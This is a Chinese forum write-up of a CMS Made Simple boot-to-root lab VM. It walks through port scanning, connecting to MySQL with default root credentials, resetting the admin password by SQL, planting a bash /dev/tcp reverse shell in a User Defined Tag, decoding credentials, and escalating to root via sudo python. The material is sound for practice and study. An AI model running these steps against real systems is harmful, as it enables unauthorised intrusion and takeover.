用户
搜索
  • TA的每日心情

    5 天前
  • 签到天数: 57 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋-见习白帽

    Rank: 3Rank: 3

    37

    主题

    48

    帖子

    1397

    魔法币
    收听
    0
    粉丝
    6
    注册时间
    2020-7-23
    发表于 2020-9-16 11:33:44 16359
    0x00:靶机下载
    描述内容大概是靶机环境是一个CMS场景目录是获得root权限。新手到中等级别。这里建议大家用VirtualBox来做方便一点
                                  
    0.png

    用VirtualBox导入以后顺便设置成桥接网卡就可以运行了,打开以后会顺便回显靶机IP出来,如果获取不了IP的话建议使用重启大法,也试过更换成NAT模式,但是没有重启大法好用
    1.png

    0x01:探测靶机
    由于已经知道了靶机IP直接开始用nmap探测端口,这次主要开了3个端口,22,80,和3306
    命令:nmap -A -sS -sV -v -p- 192.168.3.192
    2.png


    0x02:漏洞挖掘
    先正常访问一波IP,可以正常回显页面
    3.png

    开始启动dirb,这里可以扫到一些后台之类的地方。
    4.png

    0x03:登录数据库
    这里返回前面,前面开启了3306数据库端口,尝试连一波看看root root能不能连上,结果发现直连成功
    命令:mysql -h 192.168.3.192 -u root -p
    5.png

    然后就是show databases;查看有哪些数据库
    6.png

    跟进cmsms_db,然后在查看里面的表,发现有一个cms_users
    7.png

    然后直接select * from cms_users得到一个admin的账号密码,有一个尴尬的问题是密码解不出来。。。。。。
    8.png

    所以只能尝试用Update语句更改admin的密码了
    语句: update cms_users set password = (selectmd5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name= 'sitemask'),''),'pikapi'))) where username = 'admin'; (这里一定要提醒一波不能直接把密码设置成字符串格式,得通过MD5加密才能存放同时它不仅仅只是MD5还涉及到另外一个表)
    9.png

    然后回到192.168.3.192/admin输入账号和刚才改过的密码成功登录
    10.png

    然后就是找能插入代码的地方了在Extensions/User Defined Tags下按编辑可以进入到代码区域
    11.png

    先提前开启netcat 然后插入一句话反弹shell语句,然后点击apply,也可以用kali自带的反弹shell
    语句: system("bash -c 'bash -i >&/dev/tcp/192.168.3.193/5555 0>&1'");
    12.png

    点击完apply以后再点击run就可以得到反弹shell了
    13.png

    0x04:信息挖掘
    既然反弹到/var/www/html/admin目录下先ls -la详细看一下该目录先,发现有个.htpasswd的东西出来了
    14.png

    Cat以后得到一串字符,数了一下长度为44石锤是base64编码
    解码了一下还是一串字符串那只能用base32继续解码了。。。。
    15.png

    16.png

    最后终于得到一个账号密码
    17.png

    输入完密码再输入一个Python的shell成功登录
    18.png

    0x05:提权
    首先先用sudo -l看看能不能运行,发现可以直接运行Python那就是送了
    19.png
    直接sudo +一条python交互式shell直接得到root权限
    20.png

    21.png
    继续看
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册